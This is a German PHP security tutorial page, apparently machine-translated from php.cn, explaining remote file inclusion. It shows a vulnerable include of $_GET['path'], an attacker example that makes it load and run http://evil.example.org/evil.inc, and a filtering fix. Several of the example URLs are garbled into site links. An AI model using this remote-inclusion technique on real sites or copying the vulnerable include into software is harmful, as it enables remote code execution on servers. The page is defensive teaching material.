PHP-Sicherheitscode-Injektion

黄舟
Freigeben: 2023-03-05 21:22:01
Original
2534 Leute haben es durchsucht



Code-Injection

Eine besonders gefährliche Situation ist, wenn Sie versuchen, fehlerhafte Daten als führenden Teil einer Dynamik zu verwenden:

 <?php
 
  include "{$_GET[&#39;path&#39;]}/header.inc";
 
  ?>
Nach dem Login kopieren


In diesem Szenario kann ein Angreifer nicht nur den Dateinamen, sondern auch die darin enthaltenen Ressourcen manipulieren. Da PHP standardmäßig nicht nur Dateien einschließen kann, kann es auch die folgenden Ressourcen einbinden (gesteuert durchallow_url_fopen in der Konfigurationsdatei):

 <?php
 
  include &#39;http://www.google.com/&#39;;
 
  ?>
Nach dem Login kopieren


Die Include-Anweisung enthält zu diesem Zeitpunkt den Webseiten-Quellcode von http://www.php.cn/ als lokale Datei. Obwohl das obige Beispiel harmlos ist, stellen Sie sich vor, was passieren würde, wenn der von GOOGLE zurückgegebene Quellcode PHP-Code enthalten würde. Auf diese Weise wird der darin enthaltene PHP-Code analysiert und ausgeführt. Dies ist eine Gelegenheit für Angreifer, Schadcode freizugeben, um Ihr Sicherheitssystem zu umgehen.

Stellen Sie sich vor, dass der Pfadwert auf die folgende vom Angreifer kontrollierte Ressource verweist:

http://www.php.cn/ ... e.org%2Fevil.inc%3F

Im obigen Beispiel ist der Wert von path URL-codiert und der ursprüngliche Wert lautet wie folgt:

http://www.php.cn/

Dies führt dazu, dass die Include-Anweisung das vom Angreifer ausgewählte Skript (evil.inc) einschließt und ausführt und der ursprüngliche Dateiname/header.inc als Anforderungszeichenfolge betrachtet wird:

  <?php
 
  include 
"http://evil.example.org/evil.inc?/header.inc";
 
  ?>
Nach dem Login kopieren


Dadurch wird vermieden, dass der Angreifer das verbleibende Verzeichnis und den Dateinamen (/header.onc) erraten und denselben Pfad und Dateinamen auf evil.example.org erstellen muss. Im Gegenteil, wenn der spezifische Dateiname der angegriffenen Website blockiert wird, muss er nur sicherstellen, dass evil.inc den legalen Code ausgibt, den er ausführen möchte.

Diese Situation ist genauso gefährlich, als würde man einem Angreifer erlauben, den PHP-Code direkt auf Ihrer Website zu ändern. Glücklicherweise kann dies verhindert werden, indem die Daten vor den Include- und Require-Anweisungen gefiltert werden:

<?php
 
  $clean = array();
 
  /* $_GET[&#39;path&#39;] is filtered and stored in 
$clean[&#39;path&#39;]. */
 
  include "{$clean[&#39;path&#39;]}/header.inc";
 
  ?>
Nach dem Login kopieren

Das Obige ist der Inhalt der PHP-Sicherheitscode-Injektion. Für weitere verwandte Inhalte achten Sie bitte auf PHP Chinesische Website (www.php.cn)!

Verwandte Etiketten:
Quelle:php.cn
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage
Über uns Haftungsausschluss Sitemap
Chinesische PHP-Website:Online-PHP-Schulung für das Gemeinwohl,Helfen Sie PHP-Lernenden, sich schnell weiterzuentwickeln!